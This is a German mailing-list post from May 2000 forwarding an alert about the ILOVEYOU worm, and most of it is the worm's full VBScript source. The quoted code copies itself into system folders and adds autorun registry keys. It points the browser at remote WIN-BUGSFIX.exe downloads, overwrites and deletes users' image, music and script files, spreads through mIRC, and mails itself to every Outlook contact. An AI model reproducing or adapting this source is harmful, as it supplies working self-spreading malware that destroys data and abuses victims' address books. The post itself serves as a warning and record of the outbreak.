Jan-Thomas Seidler on Thu, 4 May 2000 13:51:06 +0200 (CEST)


[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

[rohrpost] Fwd: Alert: Wurm ILOVEYOU randaliert


...nicht nur in At sondern auch in D ist wohl gerade die h�lle los...
jan-thomas


Urspr�ngliche Nachricht:
> q/depesche 00.5.4/3
> 
> 
> Alert: Wurm ILOVEYOU randaliert in AT
> 
> Subject: ILOVEYOU
> 
> inhalt folgendes vbs script, soll sehr infekti�s sein. Genaueres sobald 
> es mehr Info gibt. Mehrere Magistratsabteilungen sollen OFFline sein.
> 
> -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- 
> relayed by [email protected]
> -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- 
> 
> rem  barok -loveletter(vbe) <i hate go to school>
> rem 			by: spyder  /  [email protected]  /
>  @GRAMMERSoft Group  /  Manila,Philippines
> On Error Resume Next
> dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
> eq=""
> ctr=0
> Set fso = CreateObject("Scripting.FileSystemObject")
> set file = fso.OpenTextFile(WScript.ScriptFullname,1)
> vbscopy=file.ReadAll
> main()
> sub main()
> On Error Resume Next
> dim wscr,rr
> set wscr=CreateObject("WScript.Shell")
> rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Wind
> ows Scripting Host\Settings\Timeout")
> if (rr>=1) then
> wscr.RegWrite 
> "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting 
> Host\Settings\Timeout",0,"REG_DWORD"
> end if
> Set dirwin = fso.GetSpecialFolder(0)
> Set dirsystem = fso.GetSpecialFolder(1)
> Set dirtemp = fso.GetSpecialFolder(2)
> Set c = fso.GetFile(WScript.ScriptFullName)
> c.Copy(dirsystem&"\MSKernel32.vbs")
> c.Copy(dirwin&"\Win32DLL.vbs")
> c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> regruns()
> html()
> spreadtoemail()
> listadriv()
> end sub
> sub regruns()
> On Error Resume Next
> Dim num,downread
> regcreate 
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
> on\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
> regcreate 
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
> on\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
> downread=""
> downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Intern
> et Explorer\Download Directory")
> if (downread="") then
> downread="c:\"
> end if
> if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
> Randomize
> num = Int((4 * Rnd) + 1)
> if num = 1 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
> Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTF
> wetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
> elseif num = 2 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
> Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikj
> UIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-
> BUGSFIX.exe"
> elseif num = 3 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
> Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hf
> FEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
> elseif num = 4 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
> Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtu
> HJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshf
> gqw237461234iuy7thjg/WIN-BUGSFIX.exe"
> end if
> end if
> if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
> regcreate 
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
> on\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
> regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet 
> Explorer\Main\Start Page","about:blank"
> end if
> end sub
> sub listadriv
> On Error Resume Next
> Dim d,dc,s
> Set dc = fso.Drives
> For Each d in dc
> If d.DriveType = 2 or d.DriveType=3 Then
> folderlist(d.path&"\")
> end if
> Next
> listadriv = s
> end sub
> sub infectfiles(folderspec)  
> On Error Resume Next
> dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
> set f = fso.GetFolder(folderspec)
> set fc = f.Files
> for each f1 in fc
> ext=fso.GetExtensionName(f1.path)
> ext=lcase(ext)
> s=lcase(f1.name)
> if (ext="vbs") or (ext="vbe") then
> set ap=fso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or 
> (ext="sct") or (ext="hta") then
> set ap=fso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> bname=fso.GetBaseName(f1.path)
> set cop=fso.GetFile(f1.path)
> cop.copy(folderspec&"\"&bname&".vbs")
> fso.DeleteFile(f1.path)
> elseif(ext="jpg") or (ext="jpeg") then
> set ap=fso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> set cop=fso.GetFile(f1.path)
> cop.copy(f1.path&".vbs")
> fso.DeleteFile(f1.path)
> elseif(ext="mp3") or (ext="mp2") then
> set mp3=fso.CreateTextFile(f1.path&".vbs")
> mp3.write vbscopy
> mp3.close
> set att=fso.GetFile(f1.path)
> att.attributes=att.attributes+2
> end if
> if (eq<>folderspec) then
> if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or 
> (s="script.ini") or (s="mirc.hlp") then
> set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
> scriptini.WriteLine "[script]"
> scriptini.WriteLine ";mIRC Script"
> scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, 
> if mIRC will"
> scriptini.WriteLine "     corrupt... WINDOWS will affect and will not 
> run correctly. thanks"
> scriptini.WriteLine ";"
> scriptini.WriteLine ";Khaled Mardam-Bey"
> scriptini.WriteLine ";http://www.mirc.com";
> scriptini.WriteLine ";"
> scriptini.WriteLine "n0=on 1:JOIN:#:{"
> scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
> scriptini.WriteLine "n2=  /.dcc send $nick "&dirsystem&"\LOVE-
> LETTER-FOR-YOU.HTM"
> scriptini.WriteLine "n3=}"
> scriptini.close
> eq=folderspec
> end if
> end if
> next  
> end sub
> sub folderlist(folderspec)  
> On Error Resume Next
> dim f,f1,sf
> set f = fso.GetFolder(folderspec)  
> set sf = f.SubFolders
> for each f1 in sf
> infectfiles(f1.path)
> folderlist(f1.path)
> next  
> end sub
> sub regcreate(regkey,regvalue)
> Set regedit = CreateObject("WScript.Shell")
> regedit.RegWrite regkey,regvalue
> end sub
> function regget(value)
> Set regedit = CreateObject("WScript.Shell")
> regget=regedit.RegRead(value)
> end function
> function fileexist(filespec)
> On Error Resume Next
> dim msg
> if (fso.FileExists(filespec)) Then
> msg = 0
> else
> msg = 1
> end if
> fileexist = msg
> end function
> function folderexist(folderspec)
> On Error Resume Next
> dim msg
> if (fso.GetFolderExists(folderspec)) then
> msg = 0
> else
> msg = 1
> end if
> fileexist = msg
> end function
> sub spreadtoemail()
> On Error Resume Next
> dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
> set regedit=CreateObject("WScript.Shell")
> set out=WScript.CreateObject("Outlook.Application")
> set mapi=out.GetNameSpace("MAPI")
> for ctrlists=1 to mapi.AddressLists.Count
> set a=mapi.AddressLists(ctrlists)
> x=1
> regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\
> WAB\"&a)
> if (regv="") then
> regv=1
> end if
> if (int(a.AddressEntries.Count)>int(regv)) then
> for ctrentries=1 to a.AddressEntries.Count
> malead=a.AddressEntries(x)
> regad=""
> regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft
> \WAB\"&malead)
> if (regad="") then
> set male=out.CreateItem(0)
> male.Recipients.Add(malead)
> male.Subject = "ILOVEYOU"
> male.Body = vbcrlf&"kindly check the attached LOVELETTER 
> coming from me."
> male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-
> YOU.TXT.vbs")
> male.Send
> regedit.RegWrite 
> "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"RE
> G_DWORD"
> end if
> x=x+1
> next
> regedit.RegWrite 
> "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEn
> tries.Count
> else
> regedit.RegWrite 
> "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEn
> tries.Count
> end if
> next
> Set out=Nothing
> Set mapi=Nothing
> end sub
> sub html
> On Error Resume Next
> dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
> dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-
> ?TITLE><META NAME=@-@Generator@-@ CONTENT=@-
> @BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
> "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? 
> [email protected] ?-? @GRAMMERSoft Group ?-? Manila, 
> Philippines ?-? March 2000@-@>"&vbcrlf& _
> "<META NAME=@-@Description@-@ CONTENT=@-@simple but i 
> think this is good...@-@>"&vbcrlf& _
> "<?-?HEAD><BODY ONMOUSEOUT=@[email protected]=#-#main#-
> #;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-
> @ "&vbcrlf& _
> "ONKEYDOWN=@[email protected]=#-#main#-#;window.open(#-
> #LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ 
> BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-
> @>"&vbcrlf& _
> "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To 
> Enable to read this HTML file<BR>- Please press #-#YES#-# button 
> to Enable ActiveX<?-?p>"&vbcrlf& _
> "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-
> @yellow@-@>----------z--------------------z----------<?-?MARQUEE> 
> "&vbcrlf& _
> "<?-?BODY><?-?HTML>"&vbcrlf& _
> "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
> "<!--?-??-?"&vbcrlf& _
> "if (window.screen){var wi=screen.availWidth;var 
> hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&v
> bcrlf& _
> "?-??-?-->"&vbcrlf& _
> "<?-?SCRIPT>"&vbcrlf& _
> "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
> "<!--"&vbcrlf& _
> "on error resume next"&vbcrlf& _
> "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
> "aw=1"&vbcrlf& _
> "code="
> dta2="set fso=CreateObject(@[email protected]@-
> @)"&vbcrlf& _
> "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
> "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
> "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
> "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
> "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-
> @)"&vbcrlf& _
> "wri.write code4"&vbcrlf& _
> "wri.close"&vbcrlf& _
> "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) 
> then"&vbcrlf& _
> "if (err.number=424) then"&vbcrlf& _
> "aw=0"&vbcrlf& _
> "end if"&vbcrlf& _
> "if (aw=1) then"&vbcrlf& _
> "document.write @-@ERROR: can#-#t initialize ActiveX@-
> @"&vbcrlf& _
> "window.close"&vbcrlf& _
> "end if"&vbcrlf& _
> "end if"&vbcrlf& _
> "Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf& _
> "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-
> ^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-
> @,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
> "?-??-?-->"&vbcrlf& _
> "<?-?SCRIPT>"
> dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
> dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
> dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
> dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
> dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
> dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
> dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
> dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
> set fso=CreateObject("Scripting.FileSystemObject")
> set c=fso.OpenTextFile(WScript.ScriptFullName,1)
> lines=Split(c.ReadAll,vbcrlf)
> l1=ubound(lines)
> for n=0 to ubound(lines)
> lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
> lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
> lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
> if (l1=n) then
> lines(n)=chr(34)+lines(n)+chr(34)
> else
> lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
> end if
> next
> set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-
> YOU.HTM")
> b.close
> set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-
> YOU.HTM",2)
> d.write dt5
> d.write join(lines,vbcrlf)
> d.write vbcrlf
> d.write dt6
> d.close
> end sub
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> -.-. --.- -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  
> COMMENTS
> mailto [email protected]
> SUBSCRIBE
> http://www.quintessenz.at OR
> mailto [email protected]
> body: subscribe
> UNSUBSCRIBE
> mailto [email protected]
> body: leave
> -.-. --.- -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  
>  # c)


_______________________________________________________________________
1.000.000 DM gewinnen - kostenlos tippen - http://millionenklick.web.de
[email protected], 8MB Speicher, Verschluesselung - http://freemail.web.de


----------------------------------------------------------
# rohrpost -- deutschsprachige Mailingliste fuer Medien- und Netzkultur
# Info: [email protected]; msg: info rohrpost
# kommerzielle Verwertung nur mit Erlaubnis der AutorInnen
# Entsubskribieren: [email protected], msg: unsubscribe rohrpost
# Kontakt: [email protected] -- http://www.mikro.org/rohrpost